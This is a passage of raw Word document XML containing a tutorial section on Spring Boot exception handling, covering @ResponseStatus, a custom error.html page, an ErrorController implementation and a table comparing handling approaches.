        <w:t xml:space="preserve">        mv</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ddObjec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errorMessag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e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Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EBA0D1"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mv</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B852927"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295A448" w14:textId="1FCE363D"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70394864" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="43AD88F5">
          <v:rect id="_x0000_i2048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="609B208F" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">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3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ResponseStatus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3CEE15" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You can associate a custom exception with an HTTP status code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D47F1DE"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7838127"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@ResponseStatu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valu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HttpStatu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OT_FOUN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easo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Employee Not Found"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C16978F"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7838127"/>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NotFoundExcepti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xtend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untimeExcepti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E55741B" w14:textId="150F7AE6"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7838127"/>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1EDAD7F3" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="736BF4F2">
          <v:rect id="_x0000_i2049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9B4484" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">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 xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom Error Page via </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Spring Boot Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA0617A" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Spring Boot, you can create </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>error.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>error.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/resources/templates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>webapp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BE75A7"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3469853"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;!-- error.html --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB43FDC"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3469853"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;h2&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>An error occurred!</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F05D1D" w14:textId="6062CF83"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3469853"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;p</w:t>
      </w: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th:text</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"${error}"&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451AF3AF" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="0FA0CEDE">
          <v:rect id="_x0000_i2050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36036248" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">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5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ErrorController</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Interface (Spring Boot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE389A" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To customize the default error handling in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F1113F" w14:textId="77777777" w:rsidR="009D7561" w:rsidRPr="00CE4B95" w:rsidRDefault="009D7561" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DFA545B"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7277734"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07831DD3"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7277734"/>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ustomErrorControll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mplement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rrorControll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C1BD762"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7277734"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63229920"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72777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RequestMapping</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error"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41594840"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72777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handleErr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935A11C"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72777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custom-error"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39726B31" w14:textId="77777777"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72777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6ADB6BF" w14:textId="1578EF21" w:rsidR="008944F0" w:rsidRPr="00CE4B95"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7277734"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BADCD29" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="272CE44E">
          <v:rect id="_x0000_i2051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A47C9A" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">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9"/>
        <w:gridCol w:w="3771"/>
      </w:tblGrid>
      <w:tr w:rsidR="008944F0" w:rsidRPr="00CE4B95" w14:paraId="2642CF9B" w14:textId="77777777" w:rsidTr="008944F0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="724D108F" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Approach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11813E61" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008944F0" w:rsidRPr="00CE4B95" w14:paraId="05B4E421" w14:textId="77777777" w:rsidTr="008944F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C2321E8" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@ExceptionHandler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AD8AEC1" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Controller-specific exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008944F0" w:rsidRPr="00CE4B95" w14:paraId="58DD26E3" w14:textId="77777777" w:rsidTr="008944F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07A07A71" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>@ControllerAdvice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3285FA39" w14:textId="77777777" w:rsidR="008944F0" w:rsidRPr="00CE4B95" w:rsidRDefault="008944F0" w:rsidP="008944F0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Global exception handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008944F0" w:rsidRPr="00CE4B95" w14:paraId="393331F5" w14:textId="77777777" w:rsidTr="008944F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
